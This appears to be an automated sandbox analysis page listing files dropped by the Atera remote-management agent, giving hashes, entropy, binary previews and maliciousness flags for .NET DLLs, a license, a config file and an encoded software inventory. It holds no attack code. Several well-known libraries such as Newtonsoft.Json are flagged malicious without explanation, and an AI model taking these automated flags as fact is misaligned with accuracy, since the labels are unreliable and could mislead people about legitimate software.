                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXTLS:WBTm
                                                                                                                                                                                                                                                                                              MD5:B59798490D7FC941B65D9D167BF653B0
                                                                                                                                                                                                                                                                                              SHA1:847D3B03FCC645D7DECB28202E6F81B4D74DF41E
                                                                                                                                                                                                                                                                                              SHA-256:43908848F40428C43F5E14EE3936E05BBB34B25B1AB02649C1B18A9B865E5F5B
                                                                                                                                                                                                                                                                                              SHA-512:E90FEA91F738C54C834A17FEEDC34DF9AEB9B998B650C0046FCD5398AE25A003B6CF1069340CBDDE8BA5C85DC525A50E1967E5508C75E031018D9AC4E371ED3B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=26.7

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):112168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.178481255293971
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:Ngs5os2RUW33uzNrscqSofyqwshFDfuX73QbQgLb/xs8bRUi+kEWWdK76tU7:N0jjnl1wuDYjQbQgLbZs8DWdKl
                                                                                                                                                                                                                                                                                              MD5:AE411E264B869D21031D5442ACEF3618
                                                                                                                                                                                                                                                                                              SHA1:CC6F471E281201D4399239EFB184C346321E24EF
                                                                                                                                                                                                                                                                                              SHA-256:37272AB76D36BC3F7371FBB2EA775C1BE98F38E3C9DEFD0D221CB3026DF5418C
                                                                                                                                                                                                                                                                                              SHA-512:F28607F0A814250C728CB4353E8D5B4251E192EC20575D29A3633DC4B726C29861B97F189B3FF83CD38F8CC9BA70F2929317BDC4602C725EC326C13F74E49C48
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y.g.........." ..0.............b.... ........... ..............................M.....`.....................................O.......8...............((.......................................................... ............... ..H............text...h.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................D.......H....... ....!...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...ta...r...p(,..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\CredentialManagement.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):38952
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3111399953479745
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:GINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgfmj5:/Nsii6v/HS0+OJd5gpKm76tgm5
                                                                                                                                                                                                                                                                                              MD5:16E79C583F7442B4B41AF27F343BB123
                                                                                                                                                                                                                                                                                              SHA1:ACD2A37BCCBF3A077B35759BDF083A5902784172
                                                                                                                                                                                                                                                                                              SHA-256:038D7677C72152B9D2F7C1A55DD19AD0329C627FD473E67A4F202847CF276AB7
                                                                                                                                                                                                                                                                                              SHA-512:A12ABC36729277939968F1A93C01D4DBF15DA75E6ADCBB3B02877201131526BA60A1BDAE2CC9C4F058954F939AA006F343C6499309A2664FEA7BCA346E251C54
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ...............................i....@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):670
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.870186870231866
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:5lh3rwhI4IaMFj27/tUYCQpU0E+dqo6rHQknd77psLlO:l334IaJUuU0E+QHQk17psLlO
                                                                                                                                                                                                                                                                                              MD5:B4ECFC2FF4822CE40435ADA0A02D4EC5
                                                                                                                                                                                                                                                                                              SHA1:8AAF3F290D08011ADE263F8A3AB4FE08ECDE2B64
                                                                                                                                                                                                                                                                                              SHA-256:A42AC97C0186E34BDC5F5A7D87D00A424754592F0EC80B522A872D630C1E870A
                                                                                                                                                                                                                                                                                              SHA-512:EAFAC709BE29D5730CB4ECD16E1C9C281F399492C183D05CC5093D3853CDA7570E6B9385FBC80A40FF960B5A53DAE6AE1F01FC218E60234F7ADCED6DCCBD6A43
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview: Copyright (c) 2017 Chocolatey Software, Inc... Copyright (c) 2011 - 2017 RealDimensions Software, LLC.... Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.... http://www.apache.org/licenses/LICENSE-2.0.... Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for the specific language governing permissions and.. limitations under the License.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.13429501746206
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:mjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvu:m+e55LgIkTmyAAfTnMLvu
                                                                                                                                                                                                                                                                                              MD5:0D4742755CA8DDC5513D338CDBAEB543
                                                                                                                                                                                                                                                                                              SHA1:05BD67409F6A3FF88FFE57F366B283D01FE6C07A
                                                                                                                                                                                                                                                                                              SHA-256:F6978EF467AC885F35F5EE6F761974CC486DD9CF12AA9178827FE86EC8550B6F
                                                                                                                                                                                                                                                                                              SHA-512:EEA314D7B17E711DFB4AA4C871BD2EDDE5B152B8B19BDCBC9D311A1DF07EA2510A02983C9702C7AB9E839EED8A25BCCAF2AACAA15F78D9D905E452EB9E764336
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`............`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960661184398182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:EBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUT:EBjk38WuBcAbwoA/BkjSHXP36RMGi
                                                                                                                                                                                                                                                                                              MD5:E0CA09DECF6BCF9F12BF5AFE621889F9
                                                                                                                                                                                                                                                                                              SHA1:CA79CF74CFBE9FFD2BC818995F6DC70DA29F2E92
                                                                                                                                                                                                                                                                                              SHA-256:822C405144EF0E6D8005948EF59502FCED2B2ABB01B6010DFA5B08155B65D903
                                                                                                                                                                                                                                                                                              SHA-512:63DCAD9130F7254500A0D11A9842D5884CBA626CFD08BBF0D0FB7014EAEB40D6FF4AF9DBE90A34E8769025D4F9719E0B6B9D9BB5E8C7EA46EE6EA06B58EA6AA1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......J.....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Buffers.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.674556786635184
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:/y/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqiPn:/uhMaVmzDC6k0EpYi60i
                                                                                                                                                                                                                                                                                              MD5:B9FEB4A492B5DC72D17382371DCFE021
                                                                                                                                                                                                                                                                                              SHA1:A4114182A2F8D2349BD8B43D61E0B50EE4A0FD9A
                                                                                                                                                                                                                                                                                              SHA-256:CDEF6D4BFEB7A3BCADE96BC3009455D638370DE13D213CF496171B93508FE8FC
                                                                                                                                                                                                                                                                                              SHA-512:731DD8DA749570A33C7B0BBA4C4CC6AE67B7910313AA3696F0F6A9D6EBF0F535F979567893E6A62BD7193424331D8A237EFBCB4F5E2EDFA6C25C0E2F6E27F027
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............((...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.266505546281646
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:EYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zzY:EKC9niwOepJ6TJPeb6NIUFg76Kz8
                                                                                                                                                                                                                                                                                              MD5:735C0F1B3DCB1E83A8C6298CE3354051
                                                                                                                                                                                                                                                                                              SHA1:6DF695211488E5B324FDB5C96934D34226A760F5
                                                                                                                                                                                                                                                                                              SHA-256:B805786E19100ED7896E8B29A0AE1E4C56562C3236DD1F0EF5338926C5FF87FD
                                                                                                                                                                                                                                                                                              SHA-512:97A0A0C2F37B702731213DA3EBCEE9893571F54A9849CF07E620147B2E7EBE4E7095D95031DB4C0D2AF56FA2D1F1A76E06130D51CB117E6C5ADC4AA02DDE9E1F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@.......R....`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Memory.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.178438711756712
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:UP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHd:Uh0qjC5RMOHO420kN12
                                                                                                                                                                                                                                                                                              MD5:7C1E36B577AC6CE1790148F8A1DA8462
                                                                                                                                                                                                                                                                                              SHA1:B221CE6727CAF2AA2DE2D3A320CC402AF69F2096
                                                                                                                                                                                                                                                                                              SHA-256:BF0D85183BCFA66BA242B3E844F01A2069E7332C8CF24BEDE7DCFCAD9A3AEC57
                                                                                                                                                                                                                                                                                              SHA-512:280F6AAAF9585B7F17390C21EC76AF4B33EDB29B1331AF78AE65891249CB233F2B42C726658EA37CDE4582C06C3AD8C5227272874186AB4E3A55D8BFB0B8CF74
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......$.....@.................................3...O.... ..0...............((...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.637457135545288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:rTO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08l8y3:rCn6xYEpYi60k8iy3
                                                                                                                                                                                                                                                                                              MD5:D8258B4140601E682A62B35D06A394FB
                                                                                                                                                                                                                                                                                              SHA1:8EDD41B730DC3667E43C247C2384DBF9E648454C
                                                                                                                                                                                                                                                                                              SHA-256:C89C3ED7B961F0318D780CD95E8758C577B08B168DE9DBDF444D1244CD89B65F
                                                                                                                                                                                                                                                                                              SHA-512:BA07495C9C5852060F4D057F7F630D20B8C3D4C3612EE04B1947C8DF8EE3C1AA9821231FF0C3592978F8F9A9F4EAD03D92D11613388DED93DCA47506242124D8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^...........!.................1... ...@....@.. ...............................]....@..................................1..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H........#......................P ......................................O..q.<.P$[p.;a<...Ci......K..!..&.d...FaLJ.....f..........w.E.E........(y...,.Lr..R..........T.z....5..;.. ....&V.=}.... .0.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0................*..0...............*...0...............*...0..........

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52264
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.161978276948053
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:vb0Koxa6kNbCGUThcuqdpN5BZMgWFv6Chh5GAEpYi60yL:n0VBqXNdM1v6sGJ76P
                                                                                                                                                                                                                                                                                              MD5:A074F080BBC54559C13E01E35B436FEA
                                                                                                                                                                                                                                                                                              SHA1:1D0B9B0EDFD2C4EE22D5BF6999A3EBC05231AF00
                                                                                                                                                                                                                                                                                              SHA-256:A8141F1679C90062BE21CC569542404DDB112C435AFB6CB3E64CA8A11D6E8CF0
                                                                                                                                                                                                                                                                                              SHA-512:4E1B6C46B8714F6F9E82B672D548A7DD1F73363199E3FF970389BDBA45870643D659C4489187515705324D4AEEDC331CFDB055F00AE413EDA4D9C38CC1458C53
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.l..........." ..0.............B.... ........... ..............................q.....`....................................O.......................((..........4...8............................................ ............... ..H............text...H.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................!.......H........M..(l............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1140
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.958392223272386
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JduPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:327iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:082A70376537A2E9B0BD9DFAD8D2496D
                                                                                                                                                                                                                                                                                              SHA1:1B4A667CFB09D050614149D6FD8A283071DC890A
                                                                                                                                                                                                                                                                                              SHA-256:50934981FA1B0066B22261984941887740838459B5CFA06846BA15F39B4D10F9
                                                                                                                                                                                                                                                                                              SHA-512:763212C74B6AB727C6E2C19CA2CDFC547B357BD5E1E5C196A3A2598DCEB316D3C8E8554A7EDD1AFA99FD38E1153EDC383631D2755BB31E70236084CF27C49875
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedir

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\cachedSoftware.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3880), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3880
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.616008854655248
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:HEEn1IGTrZHDgfQyDfSId6k/Sei3UQp1YilXTeMjIR:HEY1VrZHUfQOaI6k/Sei3JXYE7U
                                                                                                                                                                                                                                                                                              MD5:87DD32890FE496C5D51E0EAA208FD851
                                                                                                                                                                                                                                                                                              SHA1:985CA317D44750CBEAB43A5BE11A7F8B89E64326
                                                                                                                                                                                                                                                                                              SHA-256:A6B4367672C8325BD830185EB6ADA33BF91B966C6A621A95E661A1AD5D7E0BDF
                                                                                                                                                                                                                                                                                              SHA-512:8322CA8F4F8AA9FBFB872D9CB1205EE9651806CF5BF4C5544E5A62221BA824FD63B618213E7791411C345B88E7CE3492BA75F54A01F2431F2C45A4711DF8D12F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:W3siUmVtb3ZlYWJsZSI6dHJ1ZSwiTmFtZSI6IjctWmlwICAoeDY0KSIsIlZlcnNpb24iOiIyMy4wMSIsIkluc3RhbGxlZE9uIjoiMjAyMy0xMC0wM1QwNjo1MToyOC40NTUzNDczLTA0OjAwIiwiUHVibGlzaGVyIjoiSWdvciBQYXZsb3YiLCJTaXplSW5CeXRlcyI6NTc4OTY5NiwiQXZhaWxhYmxlVmVyc2lvbiI6IjI0LjkuMCIsIlN0YXR1cyI6Ik91dGRhdGVkIiwiVGhpcmRQYXJ0eU5hbWUiOiI3emlwLmluc3RhbGwifSx7IlJlbW92ZWFibGUiOnRydWUsIk5hbWUiOiJBZG9iZSBBY3JvYmF0ICg2NC1iaXQpIiwiVmVyc2lvbiI6IjIzLjAwNi4yMDMyMCIsIkluc3RhbGxlZE9uIjoiMjAyMy0xMC0wM1QwMDowMDowMCIsIlB1Ymxpc2hlciI6IkFkb2JlIiwiU2l6ZUluQnl0ZXMiOjYyNjc0NTM0NCwiQXZhaWxhYmxlVmVyc2lvbiI6bnVsbCwiU3RhdHVzIjoiSW5zdGFsbGVkIiwiVGhpcmRQYXJ0eU5hbWUiOm51bGx9LHsiUmVtb3ZlYWJsZSI6ZmFsc2UsIk5hbWUiOiJBdGVyYUFnZW50IiwiVmVyc2lvbiI6IjEuOC43LjIiLCJJbnN0YWxsZWRPbiI6IjIwMjQtMDItMjhUMTA6NTI6MDQtMDU6MDAiLCJQdWJsaXNoZXIiOiJBdGVyYSBuZXR3b3JrcyIsIlNpemVJbkJ5dGVzIjo0OTIwMDQ4LCJBdmFpbGFibGVWZXJzaW9uIjpudWxsLCJTdGF0dXMiOiJJbnN0YWxsZWQiLCJUaGlyZFBhcnR5TmFtZSI6bnVsbH0seyJSZW1vdmVhYmxlIjpmYWxzZSwiTmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJWZXJzaW9uIjoiMTE3LjAuNTkzOC4x

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_15-log.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):456
